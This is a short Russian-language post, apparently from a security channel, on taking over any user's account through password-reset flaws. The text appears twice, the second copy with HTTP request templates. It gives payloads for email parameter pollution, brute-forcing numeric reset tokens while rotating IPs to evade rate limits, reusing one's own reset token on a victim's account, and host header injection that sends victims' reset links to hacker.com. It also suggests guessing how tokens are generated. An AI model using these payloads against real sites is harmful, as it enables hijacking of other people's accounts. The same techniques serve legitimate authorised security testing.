🔐 Захват аккаунта с помощью функции сброса пароля
Несколько способов, которые могут помочь вам сбросить пароль любого пользователя на сайте, для захвата его аккаунта.
1) Включите свою почту в качестве второго параметра (таким образом вы можете получить ссылку для сброса):
2) Брутфорс токена сброса, если он числовой. Вы можете использовать IP Rotator на Burpsuite, чтобы обойти ограничение скорости в случае, если оно основано на IP:
3) Попробуйте использовать свой токен сброса для учетной записи жертвы:
4) Внедрение заголовка хоста; измените website.com на hacker.com (жертва может получить ссылку сброса с вашего хоста вместо исходного сайта):
5) Попытайтесь выяснить, как генерируются токены. В качестве примера они могут быть:
-созданными на основе метки времени (даты, текущего времени и т.д.)
-созданными на основе идентификатора пользователя
-созданными на основе электронной почты пользователя
Кроме вышеперечисленных, стоит попробовать способы, представленные в этом и этом посте на нашем канале.
#web #ato
Несколько способов, которые могут помочь вам сбросить пароль любого пользователя на сайте, для захвата его аккаунта.
1) Включите свою почту в качестве второго параметра (таким образом вы можете получить ссылку для сброса):
POST /resetPassword
[...]
[email protected]&[email protected]
2) Брутфорс токена сброса, если он числовой. Вы можете использовать IP Rotator на Burpsuite, чтобы обойти ограничение скорости в случае, если оно основано на IP:
POST /resetPassword
[...]
[email protected]&code=$BRUTE$
3) Попробуйте использовать свой токен сброса для учетной записи жертвы:
POST /resetPassword
[...]
[email protected]&code=$YOUR-TOKEN$
4) Внедрение заголовка хоста; измените website.com на hacker.com (жертва может получить ссылку сброса с вашего хоста вместо исходного сайта):
POST /resetPassword
Host: hacker.com
[...]
5) Попытайтесь выяснить, как генерируются токены. В качестве примера они могут быть:
-созданными на основе метки времени (даты, текущего времени и т.д.)
-созданными на основе идентификатора пользователя
-созданными на основе электронной почты пользователя
Кроме вышеперечисленных, стоит попробовать способы, представленные в этом и этом посте на нашем канале.
#web #ato